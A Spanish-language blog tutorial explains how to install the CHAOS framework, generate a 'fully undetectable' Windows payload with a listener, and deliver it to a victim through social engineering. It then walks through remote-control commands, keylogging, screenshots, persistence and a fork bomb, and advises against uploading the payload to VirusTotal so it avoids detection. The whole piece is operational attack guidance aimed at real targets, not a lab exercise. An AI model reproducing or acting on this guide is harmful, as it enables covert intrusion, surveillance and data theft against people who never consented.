Hackear Windows 7/8/10 con Framework CHAOS
5 (100%) 18 votos

CHAOS es un framework basado en Linux a través del cual puede generar fácilmente payloads y controlar máquinas remotas como Windows XP/Vista/7/8/8.1/10.

En otros palabras, se puede decir que CHAOS Framework es la versión mínima del METASPLOIT FRAMEWORK, porque tiene funciones limitadas que puede realizar con su objetivo, pero lo mejor de CHAOS Framework es que la carga útil (payload) que generará es 100% FUD (Totalmente indetectable).

ADVERTENCIA

PUEDE UTILIZAR ESTE SOFTWARE BAJO SU PROPIO RIESGO. LOS DESARROLLADORES Y ESTE BLOG NO ASUMEN NINGUNA RESPONSABILIDAD.

1. Características del Framework CHAOS

  • Usted puede controlar cualquier máquina de Windows de forma remota.
  • Puede descargar y/o cargar fácilmente cualquier archivo.
  • Incluso puede hacer que su sesión sea permanente al poner su carga en el inicio de Windows.
  • Obtenga los detalles del sistema operativo con un solo comando.
  • Usted puede incluso jugarle algunas bromas a su objetivo, tales como abrir cualquier URL, o ejecutar la bomba fork, etc.


2. Instalación del Framework CHAOS

  • Para instalar este framework, primero debe descargar dos paquetes que puede descargar fácilmente desde el repositorio de Kali Linux escribiendo el siguiente comando:
apt install golang upx-ucl -y

El comando anterior instalará los paquetes Golang y UPX en tu máquina Kali Linux. Mejor aún, instale otro requerimientos faltantes:

go get github.com/kbinani/screenshot
go install github.com/kbinani/screenshot
  • Ahora el siguiente paso es instalar el framework CHAOS que está disponible en Github.
git clone https://github.com/tiagorlampert/CHAOS.git
Instalar Framework CHAOS

Instalar Framework CHAOS

  • Después de eso, solo ingrese al directorio CHAOS y ejecute el siguiente comando para ejecutar CHAOS:
cd CHAOS
go run CHAOS.go
Iniciar Framework CHAOS

Iniciar Framework CHAOS

3. Preparación de CHAOS e Ingeniería Social

INFORMACIÓN

Para este ejemplo, he utilizado Kali Linux como máquina atacante y Windows 10 como máquina objetivo. Misma Red.
  • Una vez ejecutado CHAOS, escriba 1 para generar la carga útil y luego le pedirá cierta información sobre la carga útil, como LHOST/ LPORT/FILENAME, etc.
Generate Payload CHAOS

Generate Payload en CHAOS

Coloca tu dirección IP de la interfaz Ethernet en LHOST y para LPORT, puede usar cualquier puerto, en este caso usaré 8080.

LHOST, LPORT, FILENAME en CHAOS

LHOST, LPORT, FILENAME en CHAOS

  • Ahora en el siguiente paso, le pedirá que escriba Y o N para comprimir su carga con UPX, le recomendamos que escriba n para no comprimir.
  • Además, le pedirá que inicie el Listener, presione Y e ingrese el mismo LPORT que utilizó anteriormente, es decir, 8080.
Iniciar Listener en CHAOS

Iniciar Listener en CHAOS

  • Ahora como puede ver, el archivo está listo en el directorio /root/CHAOS/ donde instaló CHAOS Framework. Use cualquier método de ingeniería social para enviar ese archivo a tu víctima/objetivo.
Carpeta personal CHAOS Framework

Carpeta personal de CHAOS Framework

4. Hacking Windows 7/8/10: Payload y Control Remoto


  • Obtendrás el estado: connected tan pronto como tu víctima ejecute el archivo como se muestra a continuación:
Estado connected Framework CHAOS

Estado: connected

  • Ahora escriba el siguiente comando para conocer la información relacionada con el sistema operativo:
getos
Comando getos en CHAOS

Comando getos en CHAOS

  • Escriba lo siguiente para enumerar todos los comandos que puede usar con CHAOS:
help
Comando help de ayuda

Comando help de ayuda

  • Para ver todos los archivos del directorio actual, escriba el siguiente comando:
dir
  • Si desea abrir cualquier URL aleatoria en la máquina objetivo, simplemente escriba:
openurl
Keylogger en Windows con Framework CHAOS

Keylogger y Screenshot en Windows con Framework CHAOS

5. Tutorial de CHAOS Framework

A continuación, te dejo un pequeño tutorial sobre la instalación uso de esta herramienta TOTALMENTE INDETECTABLE. Al menos hasta la fecha (Mayo 2018).

RECOMENDACIÓN

No subirlo a virus total

Hay algunas cosas más que se pueden lograr: Screenshot, Keylogger, Descargar/cargar fácilmente cualquier cosa con el comando download y upload. Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉


¡Mantente actualizado!

Suscríbete a nuestro boletín semanal...

Suscríbete a nuestro boletín electrónico para recibir artículos útiles y ofertas especiales. No te perderás absolutamente de nada!

Enviaremos solamente boletines al email y no compartiremos tu email.